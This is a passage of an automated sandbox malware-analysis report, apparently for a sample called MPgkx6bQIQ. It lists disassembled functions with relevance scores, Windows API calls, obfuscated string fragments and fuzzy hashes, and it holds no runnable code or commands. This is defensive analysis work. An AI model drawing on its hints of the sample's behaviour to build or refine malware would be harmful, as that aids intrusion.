                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                                          Function 024A3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                          • Instruction ID: 0b95a4a5ac87f7a12cdeb98e31fa16e5e6f6b5ad0cc6a7354cbd6f5cd4a09f7c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A43242B0601B469FDB48CF2AD580389BBB1FF45300F548698C9695FB4ADB35A892CFC0
                                                                                                                                                                                                                                                                                          Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                          • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                                          Function 00419770 Relevance: 10.0, APIs: 2, Strings: 3, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419CD6
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419D3B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M$Wu
                                                                                                                                                                                                                                                                                          • API String ID: 764372645-1153405131
                                                                                                                                                                                                                                                                                          • Opcode ID: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
                                                                                                                                                                                                                                                                                          • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                                          Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                                          • API String ID: 0-119712241
                                                                                                                                                                                                                                                                                          • Opcode ID: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
                                                                                                                                                                                                                                                                                          • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                                          Function 024AB763 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                          • API String ID: 3664257935-261129489
                                                                                                                                                                                                                                                                                          • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                                          • Instruction ID: 25cbe531ef983319114dc2f5f9fbeed8b6ade6eb375272f66745fd9a61d92d3e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E1C87151D3C18AE775CF25C4607BBBBD6EFE2208F1848AEC1D987292DB79414AC712
                                                                                                                                                                                                                                                                                          Function 024999D7 Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                                          • API String ID: 3664257935-936430989
                                                                                                                                                                                                                                                                                          • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                                          • Instruction ID: afa4a11deb1eb790df95643616c704eaece956ec20bd9ac55d847abba478cdf1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D48203746083509FDB248F249884B6FBFE2EFC6718F28892EE58547391D772D842CB56
                                                                                                                                                                                                                                                                                          Function 024A1347 Relevance: 8.0, Strings: 6, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                                                          • API String ID: 0-1072848446
                                                                                                                                                                                                                                                                                          • Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                                                          • Instruction ID: f053d8d88037b6577d0dc540d670b171f3ca9efdd8dffbfa78d95a24bfab15ca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17229D7560C7908FD3209F28C46436FBBE1AB96324F088A2EE5DE873D1D7758885CB52
                                                                                                                                                                                                                                                                                          Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                                          • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                                          • Opcode ID: f41f14918171499e701083ac4cca6cd69cf693930fc7e871dea7447ab30f5b7a
                                                                                                                                                                                                                                                                                          • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f41f14918171499e701083ac4cca6cd69cf693930fc7e871dea7447ab30f5b7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                                          Function 024AC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                          • Instruction ID: 45400f8afca93c5224be32374253f3e626fe7ba211acc8360950aa97c9417813
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CB1FA7010D3818AD364CF29C4A07BBFBD2AFE6304F188A5ED4DA8B391DB758549C712
                                                                                                                                                                                                                                                                                          Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                          • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                                          Function 024889F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 02488A1B
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02488A25
                                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02488AC2
                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 02488AD7
                                                                                                                                                                                                                                                                                            • Part of subcall function 0248BC37: FreeLibrary.KERNEL32(02488BD2), ref: 0248BC3D
                                                                                                                                                                                                                                                                                            • Part of subcall function 0248BC37: FreeLibrary.KERNEL32 ref: 0248BC5E
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02488BD9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                          • Instruction ID: 32fc16b6d54a95302a4d4f1d623382d6dc466224f9fb23ff5545f67503981d54
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA417B77F543180BD71CBEA98C993AEB6979BC4314F0A803F6985AB390DE785C0656D0
                                                                                                                                                                                                                                                                                          Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                                          • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                                          • Opcode ID: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
                                                                                                                                                                                                                                                                                          • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                                          Function 024A0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                                          • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                          • Instruction ID: 4e0eea66cff0f6b9496aca2dce0eb99fe8499485080f3b5597ab95928cc6be57
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD118B56183018BD724DF25C8A176BB7F2EFA2314F18996DD4828F3A4F7799401CB52
                                                                                                                                                                                                                                                                                          Function 024AC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction ID: a0e3043ec67e3de6e7873e2ebe6bec725442fe8fe72bc62a0d17d56f8b2c2404
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3A1EA7110D3818BE364CF29C4A07BBBBD2AFE2304F18896ED4DA8B391DB758549C756
                                                                                                                                                                                                                                                                                          Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                                          Function 024AC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                          • Instruction ID: ce5a0078d03f97aafd8e637aee6b92b66fb343947fb904c4b805f963b4cd0d89
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A1FB7010D3818BE364CF29C4A07BBBBD2AFE2304F18896ED4DA8B391DB758549C756
                                                                                                                                                                                                                                                                                          Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                          • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                                          Function 024AC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                          • Instruction ID: b6c84b30acdec967f227c94cb53ac2f55d8d26962341561a6ea0e9572039e90d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFA1D57110D3818AE364CF29C4A07ABBBD2AFE2304F188A6ED4D98B391DB758549C756
                                                                                                                                                                                                                                                                                          Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
